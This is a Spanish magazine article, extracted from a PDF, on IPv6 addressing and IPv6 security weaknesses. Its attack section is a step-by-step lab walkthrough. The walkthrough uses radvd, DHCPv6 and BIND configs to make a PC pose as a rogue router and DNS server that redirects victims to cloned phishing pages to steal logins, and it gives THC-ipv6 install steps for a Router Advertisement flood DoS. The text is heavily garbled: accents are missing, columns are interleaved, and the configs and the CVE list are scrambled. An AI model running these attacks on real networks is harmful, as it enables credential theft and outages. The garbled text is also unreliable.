Formato de Direcciones IPv6.La cabecera de un paquete IPv6 es de 40 bytes fijo, lo cual es considerablemente ms grande que la cabecera de IPv4, esto se debe principalmente por los 32 bytes que ocupan ahora las direcciones IP origen y destino. Otra caracterstica de la cabecera del paquete IPv6 es que ahora el nmero de campos ha disminuido de 14 a solo 8 campos, entre los que estn: Versin (Version): Indica la versin del protocolo IP, en este caso su valor es igual a 6. Clase de trfico (Traffic Class): Incluye informacin para clasificar el tipo de trfico que lleva el paquete, para que los routers aplique la poltica de enrutamiento ms adecuada. Tiene la misma funcionalidad que el campo Type of Service de IPv4. Etiqueta de flujo (Flow Label): Ubica a un flujo de paquetes, que les sirve a los routers para identificar rpidamente paquetes que deben ser tratados de la misma manera (para QoS). Tamao de la carga til (Payload Length): Indica el
2 Estudio IPv6, Gonzlez Gonzlez, Eduardo, 2012, Universitat Oberta de Ca-
Todos estos factores hacen que la implementacin de IPv6 en una empresa se vuelva ms compleja y pueda derivar en agujeros de seguridad que exploten aspectos que IPv6 utiliza para su funcionamiento. Revisin del Funcionamiento del protocolo IPv6 Las principales caractersticas que este protocolo presenta se van a detallar a continuacin: Espacio de Direcciones: El tamao total de la direccin IPv6 es de 128[bits], lo que permitir que se puedan tener en teora alrededor de 3.4 x 1038 direcciones disponibles, lo que garantizar que todos los dispositivos puedan acceder a una direccin IP. Nuevo formato de Cabecera: Aunque la cabecera IPv6 sea mayor a la de IPv4, se han quitado muchos campos de la cabecera que eran poco utilizados, para obtener un manejo ms eficiente de los paquetes.
talunya, Trabajo Final de Mster
tamao de la carga til del paquete. Las cabeceras adicionales son consideradas parte de la carga para este clculo. Prximo encabezado (Next Header): Indica que existe una siguiente cabecera en la que se especificarn opciones especficas para el paquete; si no se utiliza con ese propsito entonces indica la cabecera de capa 4que ser la siguiente. Lmite de saltos (Hop Limit): Indica el mximo nmero de saltos que puede realizar el paquete. Este valor disminuye en uno por cada router que reenva el paquete. Si el valor llega a cero, el paquete es descartado. Direccin de origen (Source Destination Address): Indica la direccin IPv6 del nodo que gener el paquete. Direccin de origen (Source Destination Address): Indica la direccin de destino final del paquete.
Versin
Traffic Class
Flow Label Hop limit
Direcciones Unicast:
Estas direcciones identifican de manera nica a cada nodo de la red, permitiendo la comunicacin punto a punto entre ellos. La nueva caracterstica que trae IPv6 es la ubicacin de las direcciones Unicast dentro de contextos, cada uno de los cuales define un dominio lgico o fsico de la red. Los tipos de contextos que se tienen son: Local al enlace (link-local): Permiten la comunicacin entre los distintos nodos conectados a un mismo enlace capa 2 del modelo ISO/OSI. Estas direcciones no pueden ser enrutadas y slo son vlidas al interior del enlace. Cada vez que un nodo IPv6 se conecta a una red, adquiere automticamente una direccin local al enlace, sin ser necesaria la intervencin del usuario o de otros dispositivos. La estructura de una direccin local al enlace es
Payload Length 40 bytes
Next Header Source Address
Destination Address
0-40 bytes
Cabeceras adicionales Datos (Payload) 32 bytes
Figura 1. Encabezado IP versin 6
Direccionamiento IPv6.Existen tres tipos de Direcciones: Unicast.- Identifica a un solo nodo. Multicast.- Identifica a un grupo de nodos. Anycast.- Identifica a un grupo de nodos, pero el paquete llega siempre al nodo ms cercano perteneciente a ese grupo.
EDICIN N 14 | 29
A CTUA LIDAD
fe80:0:0:0:<identificador de interfaz>. El identificador de interfaz se genera automticamente a partir de su direccin MAC, siguiendo el formato EUI-64. Ejemplo: MAC: 39:A7:D3:F9:61:A1 Dir. IPv6: fe80:0:0:0:039A7:D3FF:FEF9:61A1 Siendo FF:FE partes de la direccin que siempre se repiten en todas las direcciones que siguen el formato EUI-64. Local nico (unique-local): Las direcciones locales nicas son direcciones que permiten la comunicacin de nodos al interior de un la red de toda una organizacin, de prefijo /48, compuesta por 1 o ms subredes. Son el equivalente a las direcciones privadas en IPv4. Al igual que las direcciones locales al enlace, no pueden ser enrutadas hacia Internet. La estructura de una direccin local nica es la siguiente:
fe 8 Identificador nico 48 40 ID Subred 16 ID interfaz 64
espacio reservado actualmente para este tipo de direcciones es de 2001:: a 3fff:ffff:ffff:ffff:ffff:ffff:ffff (2001::/3). Todas las subredes en el espacio de direccionamiento unicast global tienen un prefijo de red fijo e igual a /64. Esto implica que los primeros 64 [bit] corresponden al identificador de red, y los siguientes corresponden a la identificacin de la interfaz de un determinado nodo.
Prefijo enrutamiento global ID Subred 48 16 ID interfaz 64
El prefijo de enrutamiento global es aquel que identifica a un sitio conectado a Internet. Dicho prefijo sigue una estructura jerrquica, con el fin de reducir el tamao de la tabla de enrutamiento global en Internet. Cada una de los Registros Regionales maneja direcciones con prefijo /23, y otorgan a cada ISP direcciones con prefijo /32, y estos a su vez dan direcciones con prefijo /48, permitiendo a cada sitio u organizacin el tener 2^16 subredes, cada una con 2^64 usuarios. Cada interfaz de red puede tener ms de una direccin IPv6, por ejemplo una interfaz puede tener una direccin Local Enlace, y dos direcciones Globales.
Figura 2. Estructura direccin Local nica
Identificador nico: Campo de 40[bits] que identifica a un sitio en particular. Dado que este tipo de direcciones no son publicadas en Internet, pueden existir distintos sitios con el mismo identificador. Identificador subred: Permite crear un plan de direccionamiento jerrquico, identificando a cada una de las 216 posibles subredes en un sitio. Identificador de interfaz: Individualiza a una interfaz presente en una determinada subred del sitio. A diferencia de las direcciones locales al enlace, este identificador no se genera automticamente. Global: Las direcciones Unicast Globales son usadas para comunicar 2 nodos a travs de Internet; son equivalentes a las direcciones pblicas en IPv4. Son el nico tipo de direcciones que pueden ser enrutadas a travs de Internet. El
Direcciones Multicast:
La estructura de una direccin multicast IPv6 es el siguiente:
FF L S 16 Identificador grupo Multicast 112(bit)
Primeros Campos: Son dos campos de 8 [bits] cada uno y que siempre llevan los valores de FF [en hexadecimal]. Campo L: Indica el tiempo de vida de un grupo multicast. Si se coloca el valor de 0 cuando es un grupo permanente y 1 cuando es un grupo
multicast temporal. Campo S: Indica el contexto o alcance del grupo. Ya existen valores predeterminados para este campo; los mismos que a continuacin se detallan:
Valor [en decimales] 1 2 5 8 E Otros valores Contexto de Grupo Nodo Enlace Sitio Organizacin Global Sin asignar o reservado
FF02:0:0:0:0:1:FFFF:FFFF La forma en que se arman estas direcciones es la siguiente:

FF L S 0:0:0:0:1 104 FF ltimos 24 bit dir.Ipv6 24
Figura 3. Direccin Multicast de Nodo Solicitado
Con estos dos campos se pueden crear varias grupos de direcciones para cada tipo de contexto y con diferente duracin, pero tambin ya existen grupos Multicast predeterminados como: Direccin IPv6 FF01::1 FF02::1 FF01::2 FF02::2 FF05::2 Descripcin Todos las interfaces en un nodo Todos los nodos en el enlace Todos los routers en la interfaz Todos los routers en el enlace Todos los routers en el sitio
Las direcciones Multicast de Nodo-Solicitado son usadas para obtener las direcciones MAC de los Nodos presentes en un mismo Enlace.
Los primeros 104 [bits] de la direccin siempre sern fijos, mientras que los ltimos 24 [bits] son tomados de las direcciones IPv6 Unicast y Anycast que tenga configurado el Nodo. Por ejemplo: Se tiene la direccin IPv6: 4037::01:800:200E:8C6C Su direccin Multicast de Nodo-Solicitado es: FF02::1:FF0E:8C6C Las direcciones Multicast de Nodo-Solicitado son usadas para obtener las direcciones MAC de los Nodos presentes en un mismo Enlace, para ello se enva un paquete con la direccin Multicast del NodoSolicitado, para que ste responda con su respectiva direccin MAC.
Las Direcciones Multicast no deben aparecer como direcciones origen en ningn paquete, as como tampoco deben estar presentes en las tablas de enrutamiento. Existe adems una clase especial de direccin Multicast llamada Direccin de Nodo-Solicitado, sta cumple con la funcin de asociar las direccines Unicast y Anycast configuradas en las interfaces de un Nodo. Esta direccin tiene como prefijo predeterminado: FF02:0:0:0:0:1:FF00::/104 por lo que el rango de direcciones Multicast de Nodo-Solicitado son: FF02:0:0:0:0:1:FF00:0000 hasta
Direcciones Anycast:
Es aquella que identifica a un grupo de interfaces. Los paquetes enviados a una direccin anycast son reenviados por la infraestructura de enrutamiento hacia la interfaz ms cercana al origen del paquete que posea una direccin anycast perteneciente al grupo.
EDICIN N 14 | 31
A CTUA LIDAD
Con el fin de facilitar la entrega, la infraestructura de enrutamiento debe conocer las interfaces que estn asociadas a una direccin anycast y su distancia en mtricas de enrutamiento, para que se enven siempre al nodo ms cercano o de menor mtrica. Una direccin Anycast se crea al asignar una misma direccin Unicast a varias interfaces de distintos Nodos. Una direccin Anycast no puede ser nunca una direccin de origen. Un uso de direcciones Anycast es el identificar a los routers que pertenecen a una organizacin y que proveen de servicio de internet. Este tipo de ataque est orientado para aquellas redes que no estn preparadas para las aplicaciones que utilizan el nuevo protocolo de red IPv6, por lo que no tienen implementado ninguna poltica de seguridad, ni ningn mecanismos que alerte al administrador de red que se est realizando acciones indebidas por medio del protocolo. El ataque consiste en tener una PC dentro de la red que se encuentre simulando ser un router que est divulgando su prefijo IPv6 por medio de paquetes de Router Advertisement, lo que causa que la vctima configure como su Default Gateway a la direccin IP versin 6 de nuestra mquina atacante. Con ello se puede causar que la vctima intente salir hacia internet a travs de las interfaces de la pc atacante, lo que se puede usar para hacer una revisin y cambio de los datos que fluyen por esta ruta. Adems de ello tambin se puede usar la mquina atacante para que acte como un servidor DNSv6, con el objetivo de configurar en las vctimas la direccin de un servidor DNS corrupto con el que podramos hacer ataques de DNS spoofing, pues dirigiramos las peticiones de DNS a portales como Facebook, o Gmail hacia direcciones IP de servidores HTTP corruptos en los que se ha clonado estas pginas web, y por medio de ellas poder obtener los usuarios y claves de las vctimas. Los detalles de cmo se realiza este ataque se explicarn la seccin de ataques. (Sacado de InfoSec Institute IT Training and Information Security Resources SLAAC Attack, http://resources. infosecinstitute.com/slaac-attack/) 2. Vulnerabilidades que usan el campo Flow Label: La etiqueta de Flow Label sirve para dar un tratamiento diferenciado a los flujos de datos que recorre una red por medio de IPv6; este comportamiento de la red puede ser usado por competidores y personas mal intencionadas para obtener un mejor servicio, o en un extremo la denegacin de servicio del trfico que nos pertenece al inyectar paquetes con direcciones IPv6 falsas o etiquetas Flow Label adulteradas.
Este tipo de ataque est orientado para aquellas redes que no estn preparadas para las aplicaciones que utilizan el nuevo protocolo de red IPv6
Vulnerabilidades de IPv6: Una vez hecha una revisin de los tipos de direcciones IPv6 y cul es su funcin dentro de la red, se abordar el tema de las debilidades3, con mayor referencia en otras investigaciones (Acosta, O, 2012), que se pueden encontrar y cul es la forma de explotarlas mediante diferentes tcnicas4. 1. Ataque por medio del envo de Paquetes de Router Advertising, y DHCPv6 :
3 4
Desplegando la red IPv6, Acosta, Oscar, 2012, El reto IPv6 Seguridad Segurana com IPv6, 2012, Flvio Gomes Figueira Camacho, Universidade
Federal Fluminense .
Adems, una de las desventajas que se presenta en una red IPv6 es que las cabeceras de los paquetes que pasan por los nodos intermedios no se verifican y no existe garanta que estos datos sean confiables, por lo que la red confa en que estos datos son tan confiables como los nodos que originan este trfico. Dado que la caracterizacin del trfico se hace por medio de 3 parmetros principales: Direcciones IPv6 Origen, Destino y etiqueta Flow Label, el riesgo de que exista la posibilidad de que se sufra un ataque de DoS depende de la oportunidad que tengan los atacantes de falsificar nuestra direccin IP. Por ello existen 3 tipos de ataques que pueden existir: Suplantacin de solamente de la etiqueta Flow Label Suplantacin de las direcciones IPv6 Origen, Destinos y la etiqueta Flow Label La capacidad de suplantar la etiqueta de Flow Label, tambin implica que este nodo malicioso pueda suplantar tambin la direccin IPv6 origen, pero este mtodo no es muy interesante para atacantes que tengan como objetivo el robo de los servicios, en vez de hacer un ataque de DoS a nuestro trfico; este ltimo ataque debera hacerse por medio de un usuario interno de la red, un router intermedio o a travs de un router sin filtrado de ingreso, pues si no existe filtrado cualquier atacante puede realizar este tipo de intrusin. Si existe presencia de un Filtrado de Ingreso de los paquetes, el ataque de suplantacin de la etiqueta Flow Labelse lo hace por medio de un router que ha sido comprometido (corrupto) dentro de la red, o por medio de un ataque de man-in-the-middle; a travs de estos medios se forjan las etiquetas y direcciones IPv6 con esto ya se tiene direcciones IPv6 que el filtrado ya no detecta como fraudulentos, con ello ya se pueden realizar un ataque de DoS que va a estar muy focalizado a un nico flujo de datos que se especific por medio de la falsificacin de los datos de la cabecera de los paquetes. El uso de Extension Headers provee al atacante maneras de eludir los mecanismos de defensa que posee la red (RA-Guard RFC-6105). Por esta razn uno de los miembros del grupo de Evaluacinde Seguridad IPv6 de IETF (Fernando Gont) ha pedido que se ignore aquellos paquetes Discovery y Advertisement que contengan Extensions Headers, para as evitar ataques que puedan utilizar esta clase de paquetes. A continuacin se va a explicar cmo se realiza la evasin del mecanismo de defensa que se implementa en la red en contra paquetes Router Advertisement fraudulentos que pueden causar ataques de DoS, DNS Spoofing y Man-in-the-middle. El uso de IPSEC dentro de IPv6, no garantiza seguridad contra ataques de este tipo, pues no contempla en sus clculos criptogrficos la etiqueta Flow Label, por lo que el cambio fraudulento del contenido de esta etiqueta sigue siendo un riesgo, aun cuando se utilice el modo de Tunneling IPSEC, pues IPSEC solo garantiza la seguridad de extremo a extremo, pues se puede comprometer al nodo final del tnel para realizar el ataque.* (Sacado de RFC 3697). 3. Ataque a travs de Extensions Headers
en paquetes Discovery y Advertisement
EDICIN N 14 | 33
A CTUA LIDAD
El mecanismo de RA-Guard (Router Advertisement Guard) es utilizado como primera lnea de defensa en contra de ataques de falsificacin de paquetes Router Advertisement (lo vamos a llamar RA), y consiste en un mecanismo de filtrado de capa 2 que sigue algunos criterios para elegir cules son los paquetes legtimos y cules no. El principio bsico de filtrado es que se descartarn cualquier paquete RA que llegue a los puertos del dispositivo capa 2, excepto aquellos paquetes que lleguen por medio de un puerto que especficamente los permite, por lo que se puede notar que la efectividad de este filtrado depende de la habilidad del dispositivo capa 2 para identificar a los paquetes RA; adems, se puede aprovechar las Extensions Headers para engaar al filtrado de paquetes RA, pues algunos dispositivos capa 2 solo examina el Header IPv6 fijo que vienen por defecto en IPv6 para determinar si este paquete es o no un paquete RA, por lo que si se tiene un Extension Header en el paquete. Por all se puede enviar la informacin que pertenece a un paquete RA y as engaar el filtrado de RA-Guard.
N=60bytes IPv6 Header N=58 Dest Opt Header ICMPv6 Router Advertisement
Figura 4. Paquete IPv6 con Extension Header para evitar filtrado RA-Guard
4. Ataque a travs del uso de Fragmentacin de Paquetes En el RFC 2460 se especifica el mecanismo de fragmentacin que permitira a los paquetes IPv6 para que se adapten al MTU mximo que se puede utilizar para atravesar una red con una tecnologa determinada. Estos fragmentos pueden ser superpuestos entre s, por lo que en el momento de ensamblaje se puede tener ambigedades; stas pueden usadas por los atacantes para vulnerar firewalls y mecanismos de deteccin de intrusiones. Es por ello que se cre un documento RFC 5722 para prohibir el uso de fragmento sobrelapados, pero en la seccin 5 del RFC 2460 se especifica que se puede usar los llamados fragmentos atmicos, que son paquetes IPv6 que son demasiado grandes para que sean llevados por medio de una red que posea un tamao mximo de MTU menor que el tamao que tiene el paquete IPv6 que quiere pasar, y por ello en vez de fragmentarlo, lo que hace es aadirle una cabecera de Header Fragmentation en la que se tiene como Fragmentation Value y el bit M con valores 0; este tipo de paquetes pueden ser creados por medio del envo de paquetes ICMPv6 Packet Too Big Error, con ello ya puedo utilizar estos headers para causar ataques como DoS de un flujo de datos de una vctima especfica (como se indica en draft-gont-6man-predictable-fragment-id) pues con los Fragment Header se puede hacer creer que los paquetes que enve la victima son todos resultado de una colisin y por lo tanto deben ser descartados; como este ataque tambin existen otros ataques que aprovechan las vulnerabilidades que tienen los paquetes que utilizan Fragments Headers.
Adems de ello otros factores que favorecen este tipo de vulnerabilidad son: Muchas implementaciones no validan los paquetes ICMPv6 Error Messages, aun cuando es una prctica recomendada en los RFCs 4443 y 592; otro factor es que despus de que un mensaje ICMPv6 Error lleg al destino, la cache destino es actualizada para que espere que todos los paquetes que lleguen posean un Fragment Header dentro ellos, lo que significa que este mensaje adulterado puede afectar a mltiples comunicaciones TCP con ese destino; y por ltimo se tiene el caso de que es casi imposible la validacin de mensajes ICMPv6 de error que hayan sido provocados por un protocolo de transporte sin conexin que est siendo encapsulado en IPv6. Otro tipo de ataque que utiliza la fragmentacin de paquetes es la evasin de mecanismos de seguridad como RA-Guard, en el que se utiliza la fragmentacin para ocultar la naturaleza de un paquete RA fraudulento que se est siendo enviado dentro de los fragmentos de un paquete IPv6 normal de datos, tal y como se muestra en la siguiente figura:
N=44bytes Header IPv6 N=58 Destination Option Header ICMPv6 Router Advertisement
Otro tipo de ataque que utiliza la fragmentacin de paquetes es la evasin de mecanismos de seguridad como RA-Guard, en el que se utiliza la fragmentacin para ocultar la naturaleza de un paquete RA fraudulento.
Headers) para ocultar el contenido que se est enviando dentro del paquete IPv6, esto se logra al tener la longitud en bytes del campo Option Destination Header en el primer paquete, mientras que para el segundo fragmento la longitud de este campo es indeterminado, lo que ocasiona que un dispositivo capa 2 que est haciendo un filtrado RAGuard no tenga la informacin de cuantos bytes debe saltarse para verificar si existe alguna cabecera IPv6 dentro del contenido del paquete fragmentado. Por estas razones es imposible a un dispositivo capa 2 el poder detectar ataques de este tipo al menos que el dispositivo sea capaz de hacer un re ensamblaje de paquetes para luego hacer el filtrado de cabeceras RA. Una manera en que podra detectar que se est siendo atacado con ste mtodo sera el detectar paquetes IPv6 que posean en el primer fragmento una cabecera Destination Option Header de un tamao de 58 bytes, con lo que se podra negar esta clase de paquetes, pero esta clase de detecin puede ser vulnerada fcilmente solo con aadir una cabecera Destination Option Header de 60 bytes antes de la primera de 58 bytes:
N=44bytes IPv6 Header N=60 Dest Option Header N=58 Dest Option Header ICMPv6 Router Advertisement
Paquete RA fraudulento sin fragmentar N=58 Destination Option Header
N=44bytes Header
IPv6
N=60 FragmentHeader
Primer Fragmento ICMPv6 Router Advertisement
N=44bytes IPv6 Header
N=60 FragmentHeader
Destination Option Header
Segundo Fragmento Figura 5. Paquete IPv6 fragmentado que lleva en su interior una cabecera RA fraudulenta.
Paquete RA fraudulento sin fragmentar
Como se puede ver, se est usando la fragmentacin junto con Option Destination Headers (Extensions
EDICIN N 14 | 35
A CTUA LIDAD
N=60 Destination Option Header
Ataques: 1) Ataque a travs de envo de Paquetes de Router Advertising y DHCPv6:
N=44bytes Header
IPv6
N=60 FragmentHeader
Primer Fragmento
N=44bytes IPv6 Header N=60 Fragment Header N=58 Dest Option Header ICMPv6 Router Advertisement
Segundo Fragmento
Figura 6. Fragmentacin de paquetes para ocultar headers de Router Advertisement
Como se ve en la figura 6, ahora el primer fragmento tiene una cabecera Option Destination de 60 bytes de longitud, mientras que en el segundo fragmento se tiene dos cabeceras Option Destination; la primera sin una longitud deterinada, por lo que para un dispositivo capa 2 sigue siendo imposible el poder detectar una cabecer IPv6 que este dentro del contenido del paquete fragmentado. (Sacado de draftgont-v6ops-ra-guard-evasion-01). Este tipo de ataque ya ha sido comprobado en switches Cisco, tal y como se public en la pgina web: SECLIST (http://seclists.org/fulldisclosure/2011/May/446), en Mayo del 2011. Alternativas para la mitigacin de ataques por Extensins Headers y fragmentacin de paquetes Para identificar paquetes RA, seguir la cadena de cabeceras, limitando el nmero de Extension Headers que puede tener un paquete, y si se viola este nmero entonces descartarlo. Si el dispositivo capa 2 identific que el paquete contiene un cabecera RA, y la direccin origen es de tipo Link-Local o de tipo indeterminado (::), entonces descartar este paquete, pues la direccin de los paquetes RA normales es de tipo Multicast.
Para realizar esta prueba de vulnerabilidad se us una distribucin Ubuntu como PC atacante, que se hace pasar como un router que va a dar los servicios de default Gateway, servidor DHCPv6 y enviar paquetes de Router Advertisement (RA) hacia la red local. El primer paso para el ataque es tener configurado una direccin IPv6 en la interfaz que est conectada a la red local: root@root:~# ifconfig 2001:6f8:608:fab::1/64 eth1 inet6 add
y adems asegurarnos que se permita el reenvo de paquetes IPv6 en esta mquina: root@root:~#sysctl -w net.ipv6.conf.all.forwarding=1 net.ipv6.conf.all.forwarding = 1 radvd: Ahora se debe instalar la aplicacin radvd, la cual que es responsable de enviar los paquetes de Router Advertisement hacia toda la red local, luego hay que cofigurarlo para que enve el prefijo que corresponda a la red Global en la que se encuentra nuestra mquina atacante (2001:6f8:608:fab::/64), y que adems le diga al host atacado que debe buscar informacin de un servidor DHCPv6:
interface
eth1
{AdvSendAdvert
on;AdvOtherConfigFlag 10;prefix
on;MinRtrAdvInterval 2001:06f8:0608:fab::/64
3;MaxRtrAdvInterval
{AdvOnLink on;AdvAutonomous on;AdvRouterAddr on;};};
AdvSendAdvert on,indica que se va a enviar paquetes RA hacia la red por medio de la interfaz eth0; AdvOtherConfigFlag on indica que en los paquetes RA que se enviarn la Flag O va a estar activada lo cual indica al host atacado que debe buscar informacin de un servidor DHCPv6 dentro de su red local para configuraciones adicionales; prefix 2001:06f8:0608:fab::/64 es el prefijo que se va a anunciar por medio de los paquetes RA. Para iniciar el servicio radvd escribimos en una consola:
@root#service radvd start
los host atacados; las lneas interface eth0 {...} indican que el pool de direcciones que se van a declarar a travs de la interfaz eth0 ser el pool1 y la duracin de la concesin de direccin IPv6 es de 3600 segundos; y entre las lneas pool pool1 {...} se definen el grupo de direcciones que contendr el pool1; en este caso estn en el rango de 1000 a 2000. Para poner a correr el servidor DHCPv6 ponemos en una consola: @root#dhcp6s dDf eth0
DHCPv6: Ahora se va a configurar el servicio DHCPv6 con el que a ms de configurar la direccin IPv6 Global de los clientes, tambin vamos a configurar como Default Gateway a un servidor DNS que en este caso ser nuestra misma PC atacante. El archivo de configuracin debe quedar como sigue:
option domain-name-servers 2001:6f8:608:fab::1; option domain-name pruebalaboratorio. ipv6; interface eth0 {address-pool pool1 3600;}; pool pool1 {range 2001:6f8:608:fab::1000 to 2001:6f8:608:fab::2000 ;};
AdvSendAdvert on,indica que se va a enviar paquetes RA hacia la red por medio de la interfaz eth0; AdvOtherConfigFlag on indica que en los paquetes RA que se enviarn la Flag O va a estar activada
DNS Por ltimo vamos a configurar el servidor DNS que va a estar funcionando en este caso sobre nuestra PC atacante, aunque eso no necesariamente debe ser as. Para el servicio DNS se ha instalado la aplicacin BIND. Aqu debemos configurar dos archivos dentro de la carpeta /etc/bind/, el primer archivo es named. conf.local:
//Vamos a responder peticiones de nombre de dominio que //vayan dirigidas a pruebalaboratorio.com //Esto se puede hacer para que nuestro servidor DNS //responda a cualquier nombre
Las dos primeras lneas indican la direccin IPv6 y nombre del servidor DNS que se va a configurar en
EDICIN N 14 | 37
A CTUA LIDAD
Retry 2419200 Expire 604800 ) Negative Cache TTL ; @ @ www @ www IN IN IN IN IN A NS A AAAA AAAA pruebalaboratorio.com. 192.168.1.19 192.168.1.19 2001:6f8:608:fab::1 2001:6f8:608:fab::1 ; ;
En este archivo decimos que se va a responder a las peticiones DNS a pruebalaboratorio.com y www.pruebalaboratorio.com con la direccin IPv4 192.168.1.19 y con la direccin IPv6 2001:6f8:608:fab::1 que son las direcciones de nuestra PC atacante.
de Dominio de la pgina a la //que se quiera hacer Phishing zone pruebalaboratorio.com { type master; file /etc/bind/ db.pruebalaboratorio; };
Con esto nos aseguramos que cuando la vctima navegue por internet y quiera entrar a una pgina web especfica, su peticin HTTP la enve hacia nuestro servidor HTTP fraudulento en el que tendremos clonada la pgina con la que haremos phishing5. 2) Ataque de DoS a Pcs que corren Microsoft Server 2003, Windows 7, Server 2008, Windows 8, FreeBSD, NetBSD, Cisco y Juniper; por medio del envo de paquetes Router Advertisement con orgenes aleatorios. En este ataque se vale de herramientas creadas por la organizacin The Hackers Choice. La herramienta puede descargarse de la siguiente direccin Web: http://www.thc.org/thc-ipv6/ Los requerimientos bsicos de la PC donde se instalarn son:
El otro archivo que vamos a configurar es db.pruelaboratorio, para ello primero lo creamos dentro del directorio que se especific en el archivo anterior, y su configuracin es la siguiente:
; ; BIND data file for local loopback interface ; $TTL @ 604800 IN SOA pruebalaboratorio.com. 2 604800 Refresh 86400 ; ; Serial ;
root.pruebalaboratorio.com (
Linux con kernel 2.6 o superior Arquitectura x86 Ethernet
Sacado de : http://resources.infosecinstitute.com/slaac-attack/
Para instalar las herramientas hay que primero instalar las libreras necesarias para que funcionen las herramientas de HTC:
@root#apt-get install libnet-pcap-perl @root#apt-get install libpcap0.8-dev @root#apt-get install libssl-dev Ahora se puede instalar las herramientas de HTC: @root#tar xzf thc-ipv6-1.8.tar.gz @root#cd thc-ipv6-1.8 @root#make
Microsoft Windows XP Tablet PC Edition Microsoft Windows XP Service Pack 3 0 Microsoft Windows Edition SP3 Microsoft Windows Edition SP2 Microsoft Edition Windows XP XP XP Professional Professional Professional x64 x64 x64
Microsoft Windows XP Professional SP3 Microsoft Windows XP Professional SP2 Microsoft Windows XP Professional SP1 Microsoft Windows XP Professional Microsoft Windows XP Media Center Edition SP3 Microsoft Windows XP Media Center Edition SP2 Microsoft Windows XP Media Center Edition SP1 Microsoft Windows XP Media Center Edition Microsoft Windows XP Home SP3 Microsoft Windows XP Home SP2 Microsoft Windows XP Home SP1 Microsoft Windows XP Home Microsoft Windows XP Gold 0 Microsoft Windows XP Embedded Update Rollup 1.0 Microsoft Windows XP Embedded SP2 Feature Pack 2007 0 Microsoft Windows XP Embedded SP3 Microsoft Windows XP Embedded SP2 Microsoft Windows XP Embedded SP1
Inicio del ataque: Una vez instaladas las herramientas se puede comenzar con el ataque, el cual consiste en el envo de cientos o miles de paquetes Router Advertisement(RA) con direcciones IPv6 y MAC origen aleatorias. La vulnerabilidad a explotar es el excesivo tiempo en CPU que toma la configuracin Stateless Autoconfiguration de cada una de las direcciones IPv6 que llegan por medio de los paquetes RA. Esta vulnerabilidad existe en los sistemas operativos Windows Server 2003, 2008, 7 ,8; FreeBSD, NetBSD y en los equipos ASA Cisco. A continuacin se muestra la lista de sistemas afectados por esta vulnerabilidad, publicada por la comunidad de seguridad Security Connect de la compaa Symantec (http://www. securityfocus.com/bid/45760/info):
CVE:
CVE-2010-4669
CVE-2010-4670 CVE-2010-4671 Published: Updated: Credit: Vulnerable: Edition SP3 Jan 11 2011 12:00AM Apr 06 2011 03:05PM vanHauser Microsoft Windows XP Tablet PC
Microsoft Windows XP Embedded Microsoft Windows XP 64-bit Edition Version 2003 SP1 Microsoft Windows XP 64-bit Edition Version 2003 Microsoft Windows XP 64-bit Edition SP1 Microsoft Windows XP 64-bit Edition Microsoft Windows XP Gold Tablet Pc
Microsoft Windows XP Tablet PC Edition SP2 Microsoft Windows XP Tablet PC Edition SP1
EDICIN N 14 | 39
A CTUA LIDAD
Microsoft Windows XP Gold Professional Microsoft Windows XP Gold Media Center Microsoft Windows XP Gold Embedded Microsoft Windows XP 0 Microsoft Windows XP 0 Microsoft Windows XP - Gold X64 Microsoft Windows XP - Gold Home Microsoft Windows XP - Gold 64-Bit-2002 Microsoft Windows Vista x64 Edition SP2 Microsoft Windows Vista x64 Edition SP1 Microsoft Windows Vista x64 Edition 0 Microsoft Windows edition SP2 Microsoft Windows edition SP1 Microsoft edition 0 Windows Vista Vista Vista Ultimate Ultimate Ultimate 64-bit 64-bit 64-bit Microsoft Windows Vista December CTP SP2 Microsoft Windows Vista December CTP SP1 Microsoft Windows Vista December CTP Gold Microsoft Windows Vista December CTP Microsoft Windows edition SP2 Microsoft Windows edition SP1 Microsoft edition 0 Windows Vista Vista Vista Business Business Business 64-bit 64-bit 64-bit
Microsoft Windows Vista Ultimate SP2 Microsoft Windows Vista Ultimate SP1 Microsoft Windows Vista Ultimate Microsoft Windows Vista SP2 Beta Microsoft Windows Vista SP2 Microsoft Windows Vista SP1 Microsoft Windows Vista Home Premium SP2 Microsoft Windows Vista Home Premium SP1 Microsoft Windows Vista Home Premium Microsoft Windows Vista Home Basic SP2 Microsoft Windows Vista Home Basic SP1 Microsoft Windows Vista Home Basic Microsoft Windows Vista Enterprise SP2 Microsoft Windows Vista Enterprise SP1 Microsoft Windows Vista Enterprise Microsoft Windows Vista Business SP2 Microsoft Windows Vista Business SP1 Microsoft Windows Vista Business Microsoft Windows Vista beta 2 Microsoft Windows Vista Beta 1 Microsoft Windows Vista Beta Microsoft Windows Vista 3.0 Microsoft Windows Vista 2.0 Microsoft Windows Vista 1.0 Microsoft Windows Vista 0 Microsoft Windows Server 2008 Standard
Microsoft Windows Vista Home Premium 64-bit edition SP2 Microsoft Windows Vista Home Premium 64-bit edition SP1 Microsoft Windows Vista Home Premium 64-bit edition 0 Microsoft Windows Vista Home Basic 64-bit edition Sp2 X64 Microsoft Windows Vista Home Basic 64-bit edition SP2 Microsoft Windows Vista Home Basic 64-bit edition Sp1 X64 Microsoft Windows Vista Home Basic 64-bit edition SP1 Microsoft Windows Vista Home Basic 64-bit edition 0 Microsoft Windows Vista Enterprise 64-bit edition SP2 Microsoft Windows Vista Enterprise 64-bit edition SP1 Microsoft Windows Vista Enterprise 64-bit edition 0 Microsoft Windows Vista December CTP X64
Edition X64 Microsoft Windows Edition SP2 Server 2008 2008 2008 2008 2008 2008 2008 2008 2008 2008 2008 2008 2008 2008 2008 Standard Standard Standard Standard Standard Standard Standard Standard Standard Standard Standard Standard Standard Standard Standard
Microsoft Windows Server 2008 for Itaniumbased Systems R2 Microsoft Windows Server 2008 for Itaniumbased Systems 0 Microsoft Windows Server 2008 for 32-bit Systems SP2 Microsoft Windows Server 2008 for 32-bit Systems 0 Microsoft Windows Edition SP2 Server 2008 2008 2008 2008 2008 2008 Enterprise Enterprise Enterprise Datacenter Datacenter Datacenter
Microsoft Windows Server Edition Release Candidate Microsoft Windows Edition Itanium Microsoft Edition 0 Windows Server Server Server
Microsoft Windows Edition - Sp2 Web
Microsoft Windows Server Edition - Sp2 Storage Microsoft Windows Edition - Sp2 Hpc Microsoft Windows Edition - Gold Web Server Server
Microsoft Windows Server Edition Release Candidate Microsoft Edition 0 Windows Server Server
Microsoft Windows Edition SP2
Microsoft Windows Server Edition - Gold Storage Microsoft Windows Server Edition - Gold Standard Microsoft Windows Server Edition - Gold Itanium Microsoft Windows Edition - Gold Hpc Server
Microsoft Windows Server Edition Release Candidate Microsoft Edition 0 Windows Server
